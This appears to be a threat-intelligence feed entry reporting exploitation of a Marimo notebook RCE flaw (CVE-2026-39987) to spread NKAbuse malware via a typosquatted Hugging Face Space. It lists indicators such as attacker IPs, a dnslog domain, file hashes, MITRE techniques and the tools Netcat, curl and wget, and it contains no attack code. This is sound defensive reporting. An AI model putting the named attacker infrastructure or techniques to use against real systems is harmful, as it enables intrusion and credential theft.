Back

Exploit of Marimo RCE Leads to NKAbuse Malware Deployment via Hugging Face

Severity: High (Score: 72.8)

Sources: Bleepingcomputer, www.sysdig.com

Summary

A critical vulnerability (CVE-2026-39987) in the Marimo Python notebook platform was disclosed on April 9, 2026, leading to active exploitation within hours. Attackers have utilized this remote code execution flaw to deploy a new variant of NKAbuse malware, which is hosted on Hugging Face Spaces. The Sysdig Threat Research Team reported 662 exploit events from April 11 to 14, 2026, involving 12 unique source IPs across 10 countries. The attacks primarily focus on credential theft, with operators employing various techniques for lateral movement, including accessing PostgreSQL and Redis databases. The malware, which operates as a remote access trojan, leverages the NKN blockchain for command and control. The exploitation of this vulnerability has rapidly escalated, indicating a significant threat to affected systems. Security professionals are advised to monitor for indicators of compromise and implement defenses against these tactics. Key Points: • CVE-2026-39987 was disclosed on April 9, 2026, and exploited within hours. • Attackers deployed NKAbuse malware via a typosquatted Hugging Face Space. • Over 662 exploit events were recorded across 10 countries from April 11 to 14, 2026.

Key Entities

  • DDoS (attack_type)
  • Malware (attack_type)
  • Australia (country)
  • Germany (country)
  • Malaysia (country)
  • CVE-2017-5638 (cve)
  • CVE-2026-39987 (cve)
  • CWE-94 - Code Injection (cwe)
  • bskke4.dnslog.cn (domain)
  • dnslog.cn (domain)
  • hf.space (domain)
  • 111.90.145.139 (ipv4)
  • 203.10.98.186 (ipv4)
  • 38.147.173.172 (ipv4)
  • 92.208.115.60 (ipv4)
  • NKAbuse (malware)
  • bdcb5867f73beae89c3fce46ad5185be (md5)
  • T1003 - OS Credential Dumping (mitre_attack)
  • T1021 - Remote Services (mitre_attack)
  • T1053 - Scheduled Task/Job (mitre_attack)
  • T1059 - Command and Scripting Interpreter (mitre_attack)
  • T1071 - Application Layer Protocol (mitre_attack)
  • Hugging Face Spaces (platform)
  • HuggingFace Spaces (platform)
  • Kubernetes (platform)
  • Linux (platform)
  • MacOS (platform)
  • 049c35fa746a8b86c100bf6b348ef6163b215898 (sha1)
  • 25e4b2c4bb37f125b693a9c57b0e743eab2a3d98234f7519cd389e788252fd13 (sha256)
  • Curl (tool)
  • Netcat (tool)
  • wget (tool)
Loading threat details...

Threat Not Found

The threat cluster you're looking for doesn't exist or has been removed.

Return to Feed